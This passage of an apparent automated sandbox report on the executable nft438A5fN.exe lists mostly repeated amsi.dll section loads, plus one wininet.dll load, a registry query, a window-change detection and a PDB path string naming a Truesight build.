                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: nft438A5fN.exeStatic file information: File size 1244672 > 1048576
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
